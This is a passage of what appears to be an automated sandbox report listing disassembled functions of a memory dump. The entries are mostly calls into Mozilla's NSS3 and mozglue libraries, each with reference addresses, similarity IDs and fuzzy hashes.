                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C503E5C
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C503E73
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C503EA6
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C503EC0
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C503ED7
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C503EEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2517541793-0
                                                                                                                                                                                                                          • Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                                                                          • Instruction ID: 0bac83c17641aff78a8d87d6a351fd53d568f568cab8474899296f46f0fc51e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 511175B1610610EFDB319E29FC02FC7B7A1AB81318F401934E65EC6A20F636E929C742
                                                                                                                                                                                                                          Function 6C582C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C582CA0
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C582CBE
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000014), ref: 6C582CD1
                                                                                                                                                                                                                          • strdup.MOZGLUE(?), ref: 6C582CE1
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C582D27
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Loaded library %s (static lib), xrefs: 6C582D22
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                          • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                          • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                          • Opcode ID: 461ea2ae8e86fadf9e162bbd41ad3737541e7776d45dd3381a69d2bf0cb5334f
                                                                                                                                                                                                                          • Instruction ID: 0a84a587b5851ab96c2f52c43d97d4292994dcbc4a6e914fc18904ded6b7fd14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 461ea2ae8e86fadf9e162bbd41ad3737541e7776d45dd3381a69d2bf0cb5334f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C1190B1602320ABEB10CF15DC48A667BB4EB85319F15853DE809C7F41E731E809CBA9
                                                                                                                                                                                                                          Function 6C47BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C47BDCA
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BDDB
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BDEC
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C47BE03
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47BE22
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47BE30
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47BE3B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1821307800-0
                                                                                                                                                                                                                          • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                          • Instruction ID: 5f964d81c9b8c11257a606a83ec57296a1e7582d1490ac854d5d33d2b95f33aa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01014EA5B4120177F620B2667C01FDB2A484F5039DF140034FE0496F82FB55F51982F6
                                                                                                                                                                                                                          Function 6C4D0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1044
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,00000800,6C46EF74,00000000), ref: 6C4D1064
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 3379159031-3315324353
                                                                                                                                                                                                                          • Opcode ID: 02acba3b3836e3072f187da29241c84086c64a4e368e9009c5ff175770932a2a
                                                                                                                                                                                                                          • Instruction ID: 74857893dbfc25011145f99ef425064ebdb4660f07c2eda5b632f5e796c99fae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02acba3b3836e3072f187da29241c84086c64a4e368e9009c5ff175770932a2a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1014870A4025097E722BF2D8C08F467A78FF43769F030119EC0896E51EB60F105DBD5
                                                                                                                                                                                                                          Function 6C501C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C501C74
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C501C92
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C501C99
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C501CCB
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C501CD2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3805613680-0
                                                                                                                                                                                                                          • Opcode ID: e12b4c4d7c8c5026a1d9c572679307f77e50c7cd1d3878ec3e7b9582dbaa7269
                                                                                                                                                                                                                          • Instruction ID: f3716130216a1e28f4058b5ac69fe08e53a65014b458d16a0b55e2fa74166e9b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e12b4c4d7c8c5026a1d9c572679307f77e50c7cd1d3878ec3e7b9582dbaa7269
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601C4B1F057129BEA10EFA49C0E74A77B4A71630CF420825E50AE6F40E765F944879F
                                                                                                                                                                                                                          Function 6C512E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C513046
                                                                                                                                                                                                                            • Part of subcall function 6C4FEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4FEE85
                                                                                                                                                                                                                          • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C4E7FFB), ref: 6C51312A
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C513154
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C512E8B
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                            • Part of subcall function 6C4FF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C4E9BFF,?,00000000,00000000), ref: 6C4FF134
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(8B3C75C0,?,6C4E7FFA), ref: 6C512EA4
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C51317B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2334702667-0
                                                                                                                                                                                                                          • Opcode ID: d1b755c599a2000ef2dcd903d391b4e963ee6d873b1f720c8ba0e42a46adff1d
                                                                                                                                                                                                                          • Instruction ID: 91b54a429861581a86dc08948bef0b1e1e0f7f341b10f581897410e47bb54534
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1b755c599a2000ef2dcd903d391b4e963ee6d873b1f720c8ba0e42a46adff1d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1A1CD71A042189FEB24CF54CC85FEAB7B5EF49308F048199E94967B41E731AD85CF91
                                                                                                                                                                                                                          Function 6C4DED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C4DED6B
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C4DEDCE
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,6C4DB04F), ref: 6C4DEE46
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4DEECA
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C4DEEEA
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C4DEEFB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3768380896-0
                                                                                                                                                                                                                          • Opcode ID: d0f05117d560ebc0d0808c02d4f1b4d350f85c3ea38f08e77777e9d2624dd252
                                                                                                                                                                                                                          • Instruction ID: 38a578178581b246e55e8bfe7458f91c19bc4e0a70a125b44e253f5859eaf33e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0f05117d560ebc0d0808c02d4f1b4d350f85c3ea38f08e77777e9d2624dd252
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B816C71A012069FEB10EF55C8A4F6AB7F5AF48309F15442CE8159B751DB31F805CBE1
                                                                                                                                                                                                                          Function 6C4DCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C4DDAE2,?), ref: 6C4DC6C2
                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C4DCD35
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                            • Part of subcall function 6C4C6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C3F
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C4DCD54
                                                                                                                                                                                                                            • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                            • Part of subcall function 6C4C7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471CCC,00000000,00000000,?,?), ref: 6C4C729F
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DCD9B
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C4DCE0B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C4DCE2C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C4DCE40
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                            • Part of subcall function 6C4DCEE0: PORT_ArenaMark_Util.NSS3(?,6C4DCD93,?), ref: 6C4DCEEE
                                                                                                                                                                                                                            • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C4DCD93,?), ref: 6C4DCEFC
                                                                                                                                                                                                                            • Part of subcall function 6C4DCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C4DCD93,?), ref: 6C4DCF0B
                                                                                                                                                                                                                            • Part of subcall function 6C4DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C4DCD93,?), ref: 6C4DCF1D
                                                                                                                                                                                                                            • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF47
                                                                                                                                                                                                                            • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF67
                                                                                                                                                                                                                            • Part of subcall function 6C4DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C4DCD93,?,?,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF78
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3748922049-0
                                                                                                                                                                                                                          • Opcode ID: 9f32c7fa0e6edeeb942aa640586f9485bb9bbffcbf048f9759fa5f98a29733bd
                                                                                                                                                                                                                          • Instruction ID: 9538587150d1a1a6fdc86a3a27b3554f0732d2339f25fd19e859184d3eae6515
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f32c7fa0e6edeeb942aa640586f9485bb9bbffcbf048f9759fa5f98a29733bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1551A1B6A001119BEB10FF69DC50FAA73F5AF48359F260528D84997740EB31F905CBD1
